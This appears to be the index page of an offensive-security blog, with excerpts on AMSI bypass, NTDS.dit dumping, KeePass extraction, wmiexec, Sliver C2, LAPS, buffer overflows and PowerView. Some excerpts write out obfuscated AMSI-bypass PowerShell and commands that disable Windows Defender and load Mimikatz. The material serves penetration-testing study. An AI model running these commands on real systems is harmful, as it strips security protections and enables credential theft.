articles

BypassAMSI BYPASS12Set-Item ('Va'+'rI'+'a'+'blE:1'+'q2'+'uZx') ([TYpE]("F"+'rE')) (Get-variable (('1Q'+'2U') +'zX'))."A`ss`Embly"."GET`TY`Pe"(('Uti'+'l','A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'...

IntroductionThe NTDS.dit file is the Active Directory database which contains : Data on all domain accounts Group membership relationships domain user password hashesThe retrieval of this file by an attacker is equivalent to the total compromise of the domain, as it means that the attacker has compromised the domain controller. In fact, this file is stored only on domain controllers and does not exist on other machines in the domain. How the NTDS dump works2.1 LocalizationThe default file p...

1. introductionKeeFarce Reborn is an offensil tool for extracting the contents of an unencrypted KeePass database when it is opened on the target machine.It is based on the work of several well-known projects: KeeFarce (extraction via DLL and CLrMD injection) KeeThief (master key recovery) KeePassHax (decryption via reflection) The aim of KeeFarce Reborn is to simplify and modernize the method, while remaining compatible with as many environments as possible. 2. How it worksThe tool takes t...

Préparation de l’environnementExécution en tant qu’administrateur1234Start-Process PowerShell_ISE -Verb RunAs Add-MpPreference -ExclusionPath "C:\Temp" Set-MpPreference -DisableRealtimeMonitoring $true Import-Module C:\Temp\Invoke-Mimikatz.ps1 Si windows defender ne peut pas être désactivé, faire un AMSI Bypass1S`eT-It`em ( ‘V’+’aR’ + ‘IA’ + (‘blE:1’+’q2') + (‘uZ’+’x’) ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( Get-varI`A`BLE ( (‘1Q’+’2U’) +’zX’ ) -VaL ).”A`...

As part of internal penetration testing in Active Directory environments, it is often necessary to execute remote commands on Windows machines. Several tools are available for this purpose, but one of the most widely used is wmiexec. The general principle of wmiexecwmiexeclets you execute remote commands without copying files or creating services on the target machine. It is based onWMI (Windows Management Instrumentation)`, a native Windows technology for controlling a local or remote sy...

Introducing SLIVER C2Sliver is an open-source command and control (C2) framework developed by Bishop Fox, which enables Red Team teams to simulate realistic attacks. It combines modularity, security and flexibility for modern penetration testing. What is a C2 framework?A C2 framework enables compromised machines to be remotely controlled by implants (or agents). These implants receive instructions from the C2 server, such as executing commands, transferring files or gathering information. The...

In most Active Directory infrastructures, each workstation has a local administrator account. This account is often poorly managed, and in some cases its password is identical on all machines. As a result, an attacker who compromises one of the machines can easily pivot on the network. To solve this problem, Microsoft introduced LAPS v1 (Local Administrator Password Solution) in 2015, then released a more comprehensive version in 2023. This article looks at how the two versions work, and the ...

ObjectiveExploit a buffer overflow vulnerability in an application by taking control of the EIP register and executing shellcode. 1. connect to the target and launch vulnserverRDP connection to target : 1rdesktop -u IEUser -p 'Passw0rd!' 172.16.5.120 Launching vulnserver with : 1vulnserver.exe 9999 Interacting with the server from our machine, we notice that depending on how we type the command and what we send, we get different responses. 2. Fuzzing with SPIKECreate a trun.spk sc...

This article will be a walkthrough of the ine lab concerning this attack. PowerviewPowerview is a PowerShell tool for reconnaissance in Windows domains. It contains a set of Powershell commands that replace the classic Windows commands of the net * type. We start the lab by opening a powershell command prompt and enabling script execution: Next, we can find the domain machines on which the current user is administrator: You can then launch a powershell session with one of these machines: HF...

What is SPIKESpike is a protocol fuzzer creation kit. It provides an API for creating your own fuzzers for network protocols, using the C++ language. SPike provides a series of basic commands for generating fuzzed messages to be sent to a network service. Scriptiong SPIKEFor TCP-based server applications, we use scrpit .spk with the generic_send_tcp interpreter (preinstalled on Kali Linux). The basic syntax is : 1generic_send_tcp <IP> <port> <script.spk> <SKIPVAR> <...